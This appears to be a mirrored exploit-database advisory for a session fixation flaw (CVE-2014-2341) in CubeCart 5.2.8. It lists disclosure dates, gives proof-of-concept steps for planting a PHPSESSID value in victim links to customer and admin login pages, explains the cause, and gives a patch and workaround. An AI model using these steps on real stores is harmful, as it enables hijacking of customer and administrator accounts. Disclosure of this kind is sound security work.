Skip to content
cyberexploits
webappphptext

CubeCart 5.2.8 - Session Fixation

CubeCart 5.2.8 - Session Fixation

Publié le 2014-04-13

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/32830.txt7eac4c3a
raw
# Exploit Title:     CubeCart 5.2.8 Session Fixation

# Exploit Author:    James Sibley (absane)

# Blog:              http://www.pentester.co

# Download link:     http://www.cubecart.com/download/5.2.8/zip

# Discovery date:    March 14th, 2014

# Vendor notified:   March 15th, 2014

# Vendor fixed:      April 10th, 2014

# Vendor ack:        http://forums.cubecart.com/topic/48427-cubecart-529-relased/

# CVE assignment:    CVE-2014-2341



CubeCart 5.2.8 is vulnerable to a session fixation vulnerability.



The only protection offered is via the User-Agent header field, which can spoofed to match the victim.



=======================

=Proof of Concept.....=

=======================



*Set the User-Agent for both attacker and victim: 

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)



*To attack a customer:

Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337



*To attack an administrator:

Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337



When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session.



=======================

=Cause................=

=======================



The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id.



The code handling login procedures do not generate new sessions upon successful authentication. 



=======================

=Mitigation...........=

=======================



Upgrade to CubeCart >= 5.2.9



If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability:



In admin.class.php add this at line 324:

$GLOBALS['session']->restart();



In user.class.php add this at line 227:

$GLOBALS['session']->restart();
Voir sur GitHub